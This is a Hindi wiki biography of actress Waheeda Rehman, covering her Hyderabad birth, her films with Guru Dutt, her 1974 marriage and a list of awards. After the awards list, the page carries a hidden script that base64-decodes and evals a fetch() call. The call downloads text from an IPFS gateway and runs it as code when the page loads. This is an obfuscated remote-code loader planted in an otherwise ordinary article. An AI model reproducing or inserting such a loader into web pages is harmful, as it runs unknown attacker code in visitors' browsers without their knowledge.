वहीदा रहमान

भारत डिस्कवरी प्रस्तुति
रेणु (चर्चा | योगदान) द्वारा परिवर्तित 09:02, 3 मई 2011 का अवतरण ('{{tocright}} चाहे वह फ़िल्म बीस साल बाद की अल्हड़ लड़की का रो...' के साथ नया पन्ना बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

चाहे वह फ़िल्म बीस साल बाद की अल्हड़ लड़की का रोल हो या फिर फ़िल्म खामोशी की गंभीर नर्स का, सभी रोल को उत्तमता से निभा लेने की बड़ी अच्छी योग्यता है वहीदा रहमान में। वहीदा रहमान का जन्म 1936 में हैदराबाद के एक परंपरागत मुस्लिम परिवार में हुआ था।

अभिनय की प्रेरणा

डाक्टर बनने का सपना संजो रखा था वहीदा रहमान ने पर किस्मत को ये मंजूर न था, फेफड़ों में इंफेक्शन की वजह से वह यथोचित शिक्षा प्राप्त नहीं कर सकी। भारतनाट्यम् में प्रवीन वहीदा रहमान को अपने अभिभावकों से अभिनय की प्रेरणा मिली। सन् 1955 में उन्हें एक के बाद एक करके दो तेलुगू फ़िल्मों में काम करने अवसर मिल गया।

सफलता

फ़िल्म सी.आई.डी. (1956) में खलनायिका का रोल दे कर गुरु दत्त वहीदा को बंबई (वर्तमान मुंबई) ले आये। सी.आई.डी. की सफलता के बाद फ़िल्म प्यासा (1957) में वहीदा रहमान को हीरोइन का रोल मिला। फ़िल्म प्यासा से ही गुरु दत्त और वहीदा रहमान का विफल प्रेम प्रसंग का आरंभ हुआ। गुरु दत्त एवं वहीदा रहमान अभिनीत फ़िल्म काग़ज के फूल (1959) की असफल प्रेम कथा उन दोनों की स्वयं के जीवन पर आधारित थी। दोनों ही कलाकारों ने फ़िल्म चौदहवीं का चाँद (1960) और साहिब बीबी और गुलाम (1962) में साथ-साथ काम किया।[1]

विवाह

सन् 1963 में गुरु दत्त और वहीदा रहमान के बीच अनबन हो गया और उनके बीच दूरी बढ़ गई। सन् 1964 में गुरु दत्त ने आत्महत्या कर ली। वहीदा रहमान ने 27 अप्रैल 1974 को कमलजीत सिंह, जो कि फ़िल्म शगुन (1964) में उनके साथ हीरो थे, से विवाह कर लिया।

पुरस्कार

नागरिक सम्मान

भारत के तीसरे सबसे प्रतिष्ठित नागरिक सम्मान पद्म भूषण के लिए नामित किए जाने पर बॉलीवुड की सदाबहार अभिनेत्री वहीदा रहमान ने सिनेमा उद्योग में और काम करने की उम्मीद जाहिर की है।

सर्वश्रेष्ठ अभिनेत्री
  • 1966 - फ़िल्मफ़ेयर पुरस्कार - गाइड
  • 1967 - बंगाल फ़िल्मी पत्रकार संघ पुरस्कार - तीसरी कसम
  • 1968 - फ़िल्मफ़ेयर पुरस्कार - नीलकमल
  • 1971 - राष्ट्रीय फ़िल्म पुरस्कार - रेशमा और शेरा
अन्य
  • 1994 - फ़िल्म फ़ेयर लाइफ़टाइम एचीवमेंट अवॉर्ड
  • 2006 - एनटीआर राष्ट्रीय पुरस्कार

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. वहीदा रहमान – एक परिपक्व अभिनेत्री (हिन्दी) (पी.एच.पी) हिन्दी वेबसाइट। अभिगमन तिथि: 3 मई, 2011